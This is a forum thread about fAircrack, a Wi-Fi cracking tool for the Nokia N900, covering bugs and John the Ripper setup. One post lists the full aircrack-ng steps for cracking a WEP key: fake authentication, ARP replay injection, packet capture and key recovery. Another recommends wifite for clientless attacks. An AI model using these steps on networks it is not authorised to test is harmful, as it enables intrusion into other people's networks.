Active Topics

 



Notices


Reply
Thread Tools
Mr Wolf's Avatar
Posts: 84 | Thanked: 22 times | Joined on Nov 2011 @ Italy
#1101
Hi to all!
Just a little question: do I have to start Bleeding-edge driver everytime I use fAircrack? Else, it doesn't work well?
I'm trying right now, and it seems to work, however.
 
Posts: 21 | Thanked: 14 times | Joined on Sep 2010
#1102
I think there might be a bug which stops faircrack from working on SSID's that have spaces in their name.

Anyone else catch that ?

sorry if its been mentioned before.

also (not to be a pest) but the macchanger doesn't seem to be very reliable.

hope its not my specific rom or kernel affecting these things :-/

Other than that great app!
 
Estel's Avatar
Posts: 5,028 | Thanked: 8,613 times | Joined on Mar 2011
#1103
As for mac changer, it's 100% reliable in my case. As for AP with spaces inside, it should be working fine using latest (0.45) fAircrack. Be sure to use this version, not 0.30 from first post.

/Estel
__________________
N900's aluminum backcover / body replacement
-
N900's HDMI-Out
-
Camera cover MOD
-
Measure battery's real capacity on-device
-
TrueCrypt 7.1 | ereswap | bnf
-
Hardware's mods research is costly. To support my work, please consider donating. Thank You!
 

The Following User Says Thank You to Estel For This Useful Post:
Posts: 3 | Thanked: 1 time | Joined on Nov 2011
#1104
how to use john
when i press it open xterminal windows for second and close nothing happen
 

The Following User Says Thank You to wasawes For This Useful Post:
StefanL's Avatar
Posts: 298 | Thanked: 341 times | Joined on Aug 2010 @ This world :)
#1105
Originally Posted by wasawes View Post
how to use john
when i press it open xterminal windows for second and close nothing happen
Make sure you have John installed on your N900. Use the following command to check:

which john

If you come up empty try the following:

sudo which john

If you still come up empty, you need to install john:

sudo apt-get install john

However, I think this is now broken with the latest Maemo version (1.7.8) of John, since I can't make it work on my unit anymore either. With this latest version we can't use the option to use a configuration file anymore, which is what the script in FAS relies on.

I will have a look at this to see how we need to fix this. This is probably related to the fact that the latest Maemo version of John is the plain vanilla version, not the community enhanced one.

Edit: Other reasons for quitting include no handshake was captured or your cap file is empty.
__________________
My phone evolution: Nokia 7610 (RIP), N82 (RIP), BB9000 (RIP), N900, BB9760 (RIP), N8, BB9900, N9 64GB
Working : Python Gorillas (Maemo5) Faircrack0.50 Update (Maemo5)
Not so much : WPScrack (Maemo5)

Last edited by StefanL; 2011-12-06 at 16:49. Reason: More info
 

The Following 2 Users Say Thank You to StefanL For This Useful Post:
Estel's Avatar
Posts: 5,028 | Thanked: 8,613 times | Joined on Mar 2011
#1106
So, it's better to force earlier version of john and blacklist new one? If yes, which one is best to hold into?
__________________
N900's aluminum backcover / body replacement
-
N900's HDMI-Out
-
Camera cover MOD
-
Measure battery's real capacity on-device
-
TrueCrypt 7.1 | ereswap | bnf
-
Hardware's mods research is costly. To support my work, please consider donating. Thank You!
 
StefanL's Avatar
Posts: 298 | Thanked: 341 times | Joined on Aug 2010 @ This world :)
#1107
Originally Posted by Estel View Post
So, it's better to force earlier version of john and blacklist new one? If yes, which one is best to hold into?
Estel,

I do not think it is that dramatic at the moment, the fix could be as simple as removing the config file setting on the call to john and adding sudo to the call of john, which the new version now seems to require. I will do some testing and revert back soon. Just managed to mess up my device installation with my upgrade to PR 1.3.1, so still trying to get my normal development environment back .

Edit: Confirmed the fix described above in the john.sh script . Back to working basic john functionality (ie. 8 characters/numbers only as described in first post). This is obviously an area of future tweaks/development.
__________________
My phone evolution: Nokia 7610 (RIP), N82 (RIP), BB9000 (RIP), N900, BB9760 (RIP), N8, BB9900, N9 64GB
Working : Python Gorillas (Maemo5) Faircrack0.50 Update (Maemo5)
Not so much : WPScrack (Maemo5)

Last edited by StefanL; 2012-01-15 at 12:27. Reason: Additional info
 

The Following 2 Users Say Thank You to StefanL For This Useful Post:
Posts: 3 | Thanked: 1 time | Joined on Nov 2011
#1108
Originally Posted by StefanL View Post
Estel,

I do not think it is that dramatic at the moment, the fix could be as simple as removing the config file setting on the call to john and adding sudo to the call of john, which the new version now seems to require. I will do some testing and revert back soon. Just managed to mess up my device installation with my upgrade to PR 1.3.1, so still trying to get my normal development environment back .

Edit: Confirmed the fix described above in the john.sh script . Back to working basic john functionality (ie. 8 characters/numbers only as described in first post). This is obviously an area of future tweaks/development.
we r waiting thanx for u help
 
Mr Wolf's Avatar
Posts: 84 | Thanked: 22 times | Joined on Nov 2011 @ Italy
#1109
Just curious to know, if possible : what are the commands used by fAircrack?
I use these commands on Xterminal (from my past use of Aircrack ):

/home/user/MyDocs/wl1251-maemo/binary/compat-wireless # sh load.sh
(Load Bleeding-edge wl1251 drivers)

airmon-ng stop ath0
airmon-ng start wlan0
(Put wireless interface in monitor mode)

airodump-ng -c [canal] mon0
(Show all available networks on a specific canal)

aireplay-ng -1 0 -e [AP ESSID] -a [AP BSSID] -h [N900 MAC Address] mon0
(Make a false authentication)

aireplay-ng -3 -b [AP BSSID] -h [N900 MAC Address] mon0
(Perform ARP Request Attack)

airodump-ng -c [canal] --bssid [AP BSSID] -w [capture] mon0
(Capture IV packets and write them to file)

aircrack-ng -z [capture*.cap]
(Find the key)

However, write these commands on the Nokia N900 is quite a pain in the a...

fAircrack is a must have application!!!
__________________
I'm Winston Wolf, I solve problems
 

The Following User Says Thank You to Mr Wolf For This Useful Post:
Posts: 2,076 | Thanked: 3,268 times | Joined on Feb 2011
#1110
Check out cleven and wifite. Especially wifite for clientless attack. Not packaged but it's just a python script on googlecode site that works very well. Cleven is in repos and will hopefully also have this option
 

The Following User Says Thank You to szopin For This Useful Post:
Reply

Tags
aircrack, aircrack-ng, epicfacepalm, pen testing, rtfm dude!


 
Forum Jump


All times are GMT. The time now is 16:01.